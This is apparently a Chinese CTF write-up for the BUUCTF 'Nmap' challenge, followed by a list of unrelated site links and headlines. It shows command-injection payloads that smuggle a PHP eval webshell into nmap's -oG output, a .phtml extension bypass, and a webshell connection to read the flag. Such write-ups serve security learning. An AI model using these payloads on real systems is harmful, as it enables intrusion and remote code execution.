当前位置: 首页 > news >正文

BUUCTF——Nmap

news 来源:原创 2025/5/18 9:42:42

BUUCTF——Nmap

进入靶场

在这里插入图片描述

类似于一个nmap的网站

在这里插入图片描述

尝试一下功能

没什么用

看看数据包 既然跟IP相关

伪造一个XXF看看

在这里插入图片描述

拼接了一下没什么用 果然没这么简单

尝试一下命令注入

构造payload 127.0.0.1 | ls

在这里插入图片描述

应该有过滤 加了个\

直接构造个php木马上传试试

127.0.0.1 | ' <?php @eval($_POST["cmd"]);?> -oG shell.php '

在这里插入图片描述

在这里插入图片描述

应该被过滤了

也没有什么提示 盲猜是后缀名 mini绕过试试

双写、php3都试过了 最后phtml成功了

127.0.0.1 | ' <?= @eval($_POST["cmd"]);?> -oG shell.phtml '

在这里插入图片描述

拼接访问一下成功上传

在这里插入图片描述

用蚁剑连接看看

成功连接

在这里插入图片描述

接下来就慢慢找flag

在根目录下找到flag

在这里插入图片描述

flag{aade295d-204f-476f-91ee-299a5fa993a2}

下播!!!!!

在这里插入图片描述

相关文章:

  • java的面向对象思想
  • 小蜗牛拨号助手用户使用手册
  • 2.1.3
  • 【基于栈的 Vue3 路由历史管理:优雅处理多系统间的导航】
  • 使用python进行船舶轨迹跟踪
  • 符合Python风格的对象(对象表示形式)
  • 使用HtmlAgilityPack采集墨迹天气中的天气数据
  • 简单神经网络(ANN)实现:从零开始构建第一个模型
  • python项目参考文献
  • 用Python玩转人工智能——数字识别技术 之二
  • QT软件安装
  • 高效完成任务:制定标准与限时完成的双重法宝
  • 三层固定实体架构:高效实现图上的检索增强生成(RAG)
  • 2024 山东省ccpc省赛
  • 【持续更新中】架构面试知识学习总结
  • 回溯法理论基础 LeetCode 77. 组合 LeetCode 216.组合总和III LeetCode 17.电话号码的字母组合
  • 在RK3588上使用NCNN和Vulkan加速ResNet50推理全流程
  • 一阶线性方程 线性方程
  • 设计模式Java
  • C语言指针深入详解(一):内存和地址、指针变量和地址、指针变量类型的意义、指针运算
  • 2人恶意传播刘国梁谣言被处罚,媒体:以法律利剑劈谣斩邪,加快推进依法治体
  • 上海交大曾小勤:科技传播不应停留于知识搬运,要做科学思维的播种机
  • 因存在安全隐患,福特公司召回约27.4万辆SUV
  • 免签国+1,中乌(兹别克斯坦)互免签证协定6月生效
  • 习近平会见智利总统博里奇
  • 专访|导演刘江:给谍战题材注入现实主义的魂